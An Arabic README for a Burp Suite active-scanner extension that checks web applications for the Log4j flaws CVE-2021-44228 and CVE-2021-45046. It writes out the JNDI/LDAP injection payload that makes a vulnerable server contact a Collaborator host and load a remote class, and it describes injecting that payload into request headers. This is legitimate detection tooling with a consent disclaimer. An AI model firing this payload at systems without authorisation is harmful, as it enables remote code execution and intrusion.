
إضافة Burp Active Scan للكشف عن ثغرات Log4j CVE-2021-44228 وCVE-2021-45046
هذا الامتداد الخاص بالماسح النشط في Burp Suite يتحقق من استغلال ثغرات Apache Log4j CVE-2021-44228 وCVE-2021-45046.
يستخدم هذا الامتداد Burp Collaborator للتحقق من المشكلة.
إذا كنت ترغب في تشغيل فحوصات هذه الوحدة فقط، يمكنك استيراد ملف التعريف extensions-only.json وتحديده كملف تعريف للفحص النشط.
أثناء الفحص النشط، يتم تجربة نقاط الإدخال التالية في هذا الامتداد:
في كل نقطة إدخال، يتم حقن الطلب بالحمولة التالية:
${jndi:ldap://{BURPCOLLABORATOR}/exploit.class}
علاوةً على ذلك، يضيف هذا الامتداد العديد من الترويسات المُفعّلة في headers (الأسطر غير المعلّقة). يتم حقن هذه الترويسات واحدًا تلو الآخر في طلب منفصل.
صُنع هذا المشروع لأغراض تعليمية واختبارات أخلاقية فقط. استخدام Log4Shell-active-scanner لاستهداف أنظمة دون موافقة مسبقة متبادلة يعد غير قانوني. تقع مسؤولية الالتزام بجميع القوانين المحلية والولائية والاتحادية المعمول بها على عاتق المستخدم النهائي. لا يتحمل المطورون أي مسؤولية ولا يتحملون أي تبعات عن سوء الاستخدام أو الأضرار الناجمة عن هذا البرنامج.
المشروع مرخّص بموجب رخصة MIT.